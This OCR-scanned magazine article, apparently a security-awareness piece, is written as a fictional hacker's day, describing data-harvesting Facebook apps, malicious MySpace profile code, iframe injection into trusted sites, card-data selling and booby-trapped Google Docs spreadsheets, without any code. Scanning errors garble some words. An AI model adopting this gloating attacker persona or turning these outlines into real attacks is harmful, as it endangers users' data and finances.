They harvest your data directly from the Web apps you use and the sites you visit. Here’s how-
It’s all become so easy. I used to write viruses and attack networks to show off how smart I am. but these days it isn’t even a challenge: Millions of you don’t run any security at all at home. The hard part was finding you. Now with this latest push toward cloud computing, especially social networking, SaaS (software as a service—all those neat Web 2.0 apps). and online stora ge. it’s easier for mew find you and harvest your data. Let me tell you how I do it.
10 AM. h’s time to unleash my new Facebook app. a cute game about putting kittens in the microwave. By running my app you agree to share your entire profile with me, and if you’ve posted anything even remotely useful to me (like a credit card number), then I figure you deserve to have me steal it. I leres a similar bit of tricke ry I wish I’d thought of: In March 2008, the Aurigma Act iveX image uploader was used to cause buffer overflow attacks that planted malware on users’ PCs.
11 A.M. My newest fake profile on MySpace is just about rea4 Web 2.0 is all about sharing user-generated cont ent—yeah, that content is my maiware, and the best part is that you’ll come and get it. Mos people don’t realize how easy MySpace makes it to customize profiles; I can upload simple code th:u your browser will run when you visit my page. 1 use that code to crash your PC while behind the scenes you download malware from another Web server I’ve compromised. This has already happened so many times that I call the tactic Old Faithful. The first one I ever heard about was the JavaScript virus Sam which hit MySpace in 2005.
2 P.M. After a hearty lunch and a lovely nap. I get back to my latest attacL planting malicious iframes on sites that you already trust. An iFrame is an inline frame—an HTML. element that makes it possible to embed one Web page inside another. I host my attacks on a server in Ukraine, break into sites you trust, like CNN or PlayStat ion.com, and insert an iFrame that sends you to my attack server while you still think you’re on CNN.com.
4 P.M. Social networking works for hackers, too. Now I’m headed online to sell the credit card and bank info I’ve stolen. There are thousands of servers hosted outs ide the U.S. with message hoards where anyone can buy or sell your identity. It’s gotten so easy that prices have come down. I get just S3 for your Visa info, but that’s okay because I’ve harvested thousands of credit card numbers today.
6 P.M. It’s time to turn my attention to online apps. Do you use Coogle Does? Google is so great. It even goes so far as to let me plant a malicious iFrame in a spreadsheet.
I can trick you into opening my spreads heet, or simply break into your account and put an iFrame in your own spreads heet. Open up the doe and infect yourself with my bot. which quietly captures pers onal info like your username and passw ord when you log in to banking sites.
I)on’t hate me, friend. After all, you’re the one who made it so easy for me.
See you online,
